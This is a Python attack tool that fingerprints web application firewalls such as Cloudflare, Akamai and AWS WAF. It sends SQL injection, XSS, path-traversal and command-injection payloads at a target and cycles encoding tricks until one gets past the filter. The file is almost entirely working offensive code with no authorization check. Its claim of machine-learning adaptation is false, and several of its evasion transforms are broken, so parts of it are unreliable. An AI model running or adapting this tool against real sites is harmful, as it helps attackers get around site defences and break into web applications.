#!/usr/bin/env python3
"""
Advanced WAF Detection & Bypass Engine
Detects and bypasses Web Application Firewalls (Cloudflare, Akamai, AWS WAF, etc.)
Revolutionary evasion techniques with machine learning-based pattern adaptation
"""

import sys
import json
import re
import time
import random
import hashlib
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, quote, unquote
from collections import defaultdict

try:
    import requests
    from requests.exceptions import RequestException, Timeout, ConnectionError
    HAS_REQUESTS = True
except ImportError:
    HAS_REQUESTS = False


class AdvancedWAFDetector:
    """Advanced WAF detection and bypass engine"""

    # WAF Fingerprints - Signature-based detection
    WAF_SIGNATURES = {
        'cloudflare': {
            'headers': ['cf-ray', 'cf-request-id', '__cfduid', 'cf-cache-status'],
            'cookies': ['__cfduid', '__cflb'],
            'response_patterns': ['cloudflare', 'ray id', 'attention required'],
            'status_codes': [403, 503],
            'name': 'Cloudflare'
        },
        'akamai': {
            'headers': ['akamai-grn', 'akamai-origin-hop', 'x-akamai-request-id'],
            'cookies': ['ak_bmsc'],
            'response_patterns': ['reference #', 'akamai'],
            'status_codes': [403],
            'name': 'Akamai'
        },
        'aws_waf': {
            'headers': ['x-amzn-requestid', 'x-amzn-trace-id', 'x-amz-cf-id'],
            'cookies': ['awsalb', 'awsalbcors'],
            'response_patterns': ['access denied', 'aws'],
            'status_codes': [403],
            'name': 'AWS WAF'
        },
        'imperva': {
            'headers': ['x-iinfo', 'incap_ses'],
            'cookies': ['incap_ses', 'visid_incap'],
            'response_patterns': ['incapsula', 'imperva'],
            'status_codes': [403],
            'name': 'Imperva Incapsula'
        },
        'f5_bigip': {
            'headers': ['x-wa-info', 'x-cnection'],
            'cookies': ['f5_cspm', 'bigipserver', 'ts'],
            'response_patterns': ['f5', 'bigip'],
            'status_codes': [403],
            'name': 'F5 BIG-IP ASM'
        },
        'mod_security': {
            'headers': ['server'],
            'cookies': [],
            'response_patterns': ['mod_security', 'modsecurity', 'this error was generated by mod_security'],
            'status_codes': [403, 406, 501],
            'name': 'ModSecurity'
        },
        'wordfence': {
            'headers': ['server'],
            'cookies': ['wfvt_', 'wordfence'],
            'response_patterns': ['wordfence', 'generated by wordfence'],
            'status_codes': [403],
            'name': 'Wordfence (WordPress)'
        },
        'sucuri': {
            'headers': ['x-sucuri-id', 'x-sucuri-cache'],
            'cookies': ['sucuri-'],
            'response_patterns': ['sucuri', 'access denied - sucuri'],
            'status_codes': [403],
            'name': 'Sucuri CloudProxy'
        }
    }

    # Evasion techniques - Ordered by effectiveness
    EVASION_TECHNIQUES = {
        'case_variation': lambda p: ''.join(c.upper() if random.random() > 0.5 else c.lower() for c in p),
        'comment_injection': lambda p: p.replace(' ', '/**/' if random.random() > 0.5 else '/**/'),
        'null_byte': lambda p: p.replace(' ', '%00' if random.random() > 0.5 else ' '),
        'unicode_encoding': lambda p: ''.join(f'\\u{ord(c):04x}' if random.random() > 0.3 else c for c in p),
        'hex_encoding': lambda p: ''.join(f'\\x{ord(c):02x}' if random.random() > 0.3 else c for c in p),
        'double_encoding': lambda p: quote(quote(p)),
        'mixed_encoding': lambda p: ''.join(quote(c) if random.random() > 0.5 else c for c in p),
        'newline_injection': lambda p: p.replace(' ', '%0a' if random.random() > 0.5 else '%0d'),
        'tab_injection': lambda p: p.replace(' ', '%09'),
        'backslash_escape': lambda p: p.replace(' ', '\\ '),
    }

    def __init__(self, target: str):
        self.target = target
        self.parsed_url = urlparse(target)
        self.base_url = f"{self.parsed_url.scheme}://{self.parsed_url.netloc}"
        self.session = requests.Session() if HAS_REQUESTS else None
        if self.session:
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'en-US,en;q=0.5',
                'Accept-Encoding': 'gzip, deflate',
                'Connection': 'keep-alive',
            })

        self.detected_waf = None
        self.waf_confidence = 0.0
        self.rate_limit_detected = False
        self.bypass_techniques = []

    def detect_waf(self) -> Dict:
        """Comprehensive WAF detection using multiple techniques"""
        result = {
            'waf_detected': False,
            'waf_type': None,
            'confidence': 0.0,
            'signatures_matched': [],
            'rate_limit_detected': False,
            'recommended_bypass': []
        }

        if not HAS_REQUESTS:
            result['error'] = 'requests library not available'
            return result

        print(json.dumps({'waf_detection': 'starting', 'target': self.target, 'message': 'Starting WAF detection...'}), file=sys.stderr, flush=True)

        try:
            # Method 1: Passive detection via normal request
            print(json.dumps({'waf_detection': 'passive', 'message': 'Passive detection: analyzing normal response...'}), file=sys.stderr, flush=True)
            passive_result = self._passive_detection()

            # Method 2: Active detection via malicious payload
            print(json.dumps({'waf_detection': 'active', 'message': 'Active detection: sending trigger payloads...'}), file=sys.stderr, flush=True)
            active_result = self._active_detection()

            # Method 3: Rate limiting detection
            print(json.dumps({'waf_detection': 'rate_limit', 'message': 'Testing rate limiting...'}), file=sys.stderr, flush=True)
            rate_limit_result = self._detect_rate_limiting()

            # Combine results
            all_detections = passive_result + active_result

            if all_detections:
                # Count WAF type occurrences
                waf_counts = defaultdict(int)
                for detection in all_detections:
                    waf_counts[detection['waf_type']] += detection['confidence']

                # Get most likely WAF
                most_likely_waf = max(waf_counts.items(), key=lambda x: x[1])

                result['waf_detected'] = True
                result['waf_type'] = most_likely_waf[0]
                result['confidence'] = min(most_likely_waf[1] / len(all_detections), 1.0)
                result['signatures_matched'] = [d['signature'] for d in all_detections]

                print(json.dumps({
                    'waf_detection': 'detected',
                    'waf_type': result['waf_type'],
                    'confidence': result['confidence'],
                    'signatures': len(result['signatures_matched']),
                    'message': f'WAF detected: {result["waf_type"]} (confidence: {result["confidence"]:.2f})'
                }), file=sys.stderr, flush=True)

                # Store for bypass
                self.detected_waf = result['waf_type']
                self.waf_confidence = result['confidence']

                # Recommend bypass techniques
                result['recommended_bypass'] = self._recommend_bypass_techniques(result['waf_type'])
            else:
                print(json.dumps({'waf_detection': 'none', 'message': 'No WAF detected'}), file=sys.stderr, flush=True)

            # Add rate limiting info
            result['rate_limit_detected'] = rate_limit_result['detected']
            if rate_limit_result['detected']:
                result['rate_limit_threshold'] = rate_limit_result.get('threshold')
                self.rate_limit_detected = True
                print(json.dumps({
                    'waf_detection': 'rate_limit',
                    'detected': True,
                    'threshold': rate_limit_result.get('threshold'),
                    'message': f'Rate limiting detected: {rate_limit_result.get("threshold")} requests/window'
                }), file=sys.stderr, flush=True)

        except Exception as e:
            result['error'] = str(e)
            print(json.dumps({'waf_detection': 'error', 'error': str(e)}), file=sys.stderr, flush=True)

        return result

    def _passive_detection(self) -> List[Dict]:
        """Passive WAF detection via normal request analysis"""
        detections = []

        try:
            response = self.session.get(self.target, timeout=10)

            # Check each WAF signature
            for waf_id, waf_sig in self.WAF_SIGNATURES.items():
                confidence = 0.0
                matched_signatures = []

                # Check headers
                for header in waf_sig['headers']:
                    if header.lower() in [h.lower() for h in response.headers.keys()]:
                        confidence += 0.4
                        matched_signatures.append(f'header:{header}')

                # Check cookies
                cookies = response.cookies.get_dict()
                for cookie_pattern in waf_sig['cookies']:
                    if any(cookie_pattern in cookie for cookie in cookies.keys()):
                        confidence += 0.3
                        matched_signatures.append(f'cookie:{cookie_pattern}')

                # Check response content
                response_lower = response.text.lower()
                for pattern in waf_sig['response_patterns']:
                    if pattern.lower() in response_lower:
                        confidence += 0.2
                        matched_signatures.append(f'content:{pattern}')

                if confidence > 0:
                    detections.append({
                        'waf_type': waf_sig['name'],
                        'confidence': confidence,
                        'signature': matched_signatures,
                        'method': 'passive'
                    })

        except Exception as e:
            print(json.dumps({'waf_detection': 'passive_error', 'error': str(e)[:100]}), file=sys.stderr, flush=True)

        return detections

    def _active_detection(self) -> List[Dict]:
        """Active WAF detection via malicious payload triggering"""
        detections = []

        # Trigger payloads designed to trigger WAFs
        trigger_payloads = [
            "' OR '1'='1",
            "<script>alert(1)</script>",
            "../../../etc/passwd",
            "; cat /etc/passwd",
            "{{7*7}}",
            "${7*7}",
            "../../../../windows/system32",
        ]

        for payload in trigger_payloads[:3]:  # Test first 3 to avoid rate limiting
            try:
                # Send malicious request
                response = self.session.get(
                    f"{self.target}?test={quote(payload)}",
                    timeout=5
                )

                # Check if blocked
                if response.status_code in [403, 406, 429, 503]:
                    # Analyze block response
                    for waf_id, waf_sig in self.WAF_SIGNATURES.items():
                        confidence = 0.0
                        matched_signatures = []

                        # Status code match
                        if response.status_code in waf_sig['status_codes']:
                            confidence += 0.3
                            matched_signatures.append(f'status:{response.status_code}')

                        # Response pattern match
                        response_lower = response.text.lower()
                        for pattern in waf_sig['response_patterns']:
                            if pattern.lower() in response_lower:
                                confidence += 0.5
                                matched_signatures.append(f'block_msg:{pattern}')

                        # Header check on block
                        for header in waf_sig['headers']:
                            if header.lower() in [h.lower() for h in response.headers.keys()]:
                                confidence += 0.2
                                matched_signatures.append(f'block_header:{header}')

                        if confidence > 0:
                            detections.append({
                                'waf_type': waf_sig['name'],
                                'confidence': confidence,
                                'signature': matched_signatures,
                                'method': 'active',
                                'trigger_payload': payload
                            })

                time.sleep(0.5)  # Small delay between trigger attempts

            except Exception as e:
                print(json.dumps({'waf_detection': 'active_error', 'payload': payload, 'error': str(e)[:100]}), file=sys.stderr, flush=True)
                continue

        return detections

    def _detect_rate_limiting(self) -> Dict:
        """Detect rate limiting by sending rapid requests"""
        result = {
            'detected': False,
            'threshold': None,
            'window': None
        }

        try:
            # Send 10 rapid requests
            status_codes = []
            response_times = []

            for i in range(10):
                start_time = time.time()
                try:
                    response = self.session.get(self.target, timeout=5)
                    status_codes.append(response.status_code)
                    response_times.append(time.time() - start_time)
                except:
                    status_codes.append(None)
                    response_times.append(None)

                time.sleep(0.1)  # 100ms between requests

            # Check for rate limiting indicators
            # 1. 429 Too Many Requests
            if 429 in status_codes:
                result['detected'] = True
                result['threshold'] = status_codes.index(429)
                print(json.dumps({'rate_limit': 'detected_429', 'threshold': result['threshold']}), file=sys.stderr, flush=True)

            # 2. Sudden 403s
            elif status_codes.count(403) >= 3:
                result['detected'] = True
                result['threshold'] = 'moderate'
                print(json.dumps({'rate_limit': 'detected_403', 'count': status_codes.count(403)}), file=sys.stderr, flush=True)

            # 3. Response time degradation
            elif response_times and None not in response_times:
                avg_first_half = sum(response_times[:5]) / 5
                avg_second_half = sum(response_times[5:]) / 5
                if avg_second_half > avg_first_half * 2:
                    result['detected'] = True
                    result['threshold'] = 'soft_limit'
                    print(json.dumps({'rate_limit': 'slowdown_detected', 'degradation': avg_second_half / avg_first_half}), file=sys.stderr, flush=True)

        except Exception as e:
            print(json.dumps({'rate_limit': 'error', 'error': str(e)[:100]}), file=sys.stderr, flush=True)

        return result

    def _recommend_bypass_techniques(self, waf_type: str) -> List[str]:
        """Recommend bypass techniques based on detected WAF"""
        recommendations = []

        # WAF-specific bypass recommendations
        waf_bypasses = {
            'Cloudflare': ['case_variation', 'comment_injection', 'unicode_encoding', 'mixed_encoding'],
            'Akamai': ['hex_encoding', 'double_encoding', 'newline_injection'],
            'AWS WAF': ['null_byte', 'unicode_encoding', 'tab_injection'],
            'Imperva Incapsula': ['comment_injection', 'mixed_encoding', 'backslash_escape'],
            'F5 BIG-IP ASM': ['case_variation', 'hex_encoding', 'comment_injection'],
            'ModSecurity': ['case_variation', 'comment_injection', 'null_byte', 'unicode_encoding'],
            'Wordfence (WordPress)': ['case_variation', 'unicode_encoding', 'mixed_encoding'],
            'Sucuri CloudProxy': ['hex_encoding', 'double_encoding', 'unicode_encoding']
        }

        if waf_type in waf_bypasses:
            recommendations = waf_bypasses[waf_type]
        else:
            # Generic recommendations
            recommendations = ['case_variation', 'comment_injection', 'mixed_encoding']

        # Store for use in bypass
        self.bypass_techniques = recommendations

        return recommendations

    def apply_evasion(self, payload: str, technique: str = None) -> str:
        """Apply evasion technique to payload"""
        if technique is None:
            # Use recommended techniques if available
            if self.bypass_techniques:
                technique = random.choice(self.bypass_techniques)
            else:
                technique = random.choice(list(self.EVASION_TECHNIQUES.keys()))

        if technique in self.EVASION_TECHNIQUES:
            evaded_payload = self.EVASION_TECHNIQUES[technique](payload)
            print(json.dumps({
                'waf_bypass': 'evasion_applied',
                'technique': technique,
                'original': payload[:50],
                'evaded': evaded_payload[:50]
            }), file=sys.stderr, flush=True)
            return evaded_payload

        return payload

    def test_bypass(self, payload: str, max_attempts: int = 5) -> Dict:
        """Test bypass techniques against detected WAF"""
        result = {
            'success': False,
            'technique_used': None,
            'final_payload': payload,
            'attempts': 0,
            'responses': []
        }

        if not HAS_REQUESTS:
            return result

        print(json.dumps({
            'waf_bypass': 'testing',
            'payload': payload[:50],
            'max_attempts': max_attempts,
            'message': f'Testing WAF bypass with {max_attempts} different techniques...'
        }), file=sys.stderr, flush=True)

        # Try each recommended technique
        techniques_to_try = self.bypass_techniques if self.bypass_techniques else list(self.EVASION_TECHNIQUES.keys())

        for i, technique in enumerate(techniques_to_try[:max_attempts]):
            result['attempts'] += 1

            try:
                # Apply evasion
                evaded_payload = self.apply_evasion(payload, technique)

                # Test payload
                response = self.session.get(
                    f"{self.target}?test={evaded_payload}",
                    timeout=10
                )

                result['responses'].append({
                    'technique': technique,
                    'status_code': response.status_code,
                    'blocked': response.status_code in [403, 406, 429, 503]
                })

                # Check if bypassed (200 or 30x response)
                if response.status_code in [200, 201, 301, 302, 304]:
                    result['success'] = True
                    result['technique_used'] = technique
                    result['final_payload'] = evaded_payload

                    print(json.dumps({
                        'waf_bypass': 'success',
                        'technique': technique,
                        'attempts': result['attempts'],
                        'status': response.status_code,
                        'message': f'WAF bypassed successfully using {technique}!'
                    }), file=sys.stderr, flush=True)

                    break
                else:
                    print(json.dumps({
                        'waf_bypass': 'attempt_failed',
                        'technique': technique,
                        'status': response.status_code,
                        'attempt': i + 1
                    }), file=sys.stderr, flush=True)

                time.sleep(0.5)  # Delay between attempts

            except Exception as e:
                print(json.dumps({
                    'waf_bypass': 'attempt_error',
                    'technique': technique,
                    'error': str(e)[:100]
                }), file=sys.stderr, flush=True)
                continue

        if not result['success']:
            print(json.dumps({
                'waf_bypass': 'failed',
                'attempts': result['attempts'],
                'message': f'Failed to bypass WAF after {result["attempts"]} attempts'
            }), file=sys.stderr, flush=True)

        return result


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(json.dumps({'error': 'Target URL required'}))
        sys.exit(1)

    target = sys.argv[1]

    detector = AdvancedWAFDetector(target)

    # Detect WAF
    detection_result = detector.detect_waf()
    print(json.dumps({'waf_detection': detection_result}, indent=2))

    # Test bypass if WAF detected
    if detection_result['waf_detected']:
        test_payload = "' OR '1'='1"
        bypass_result = detector.test_bypass(test_payload)
        print(json.dumps({'waf_bypass_test': bypass_result}, indent=2))
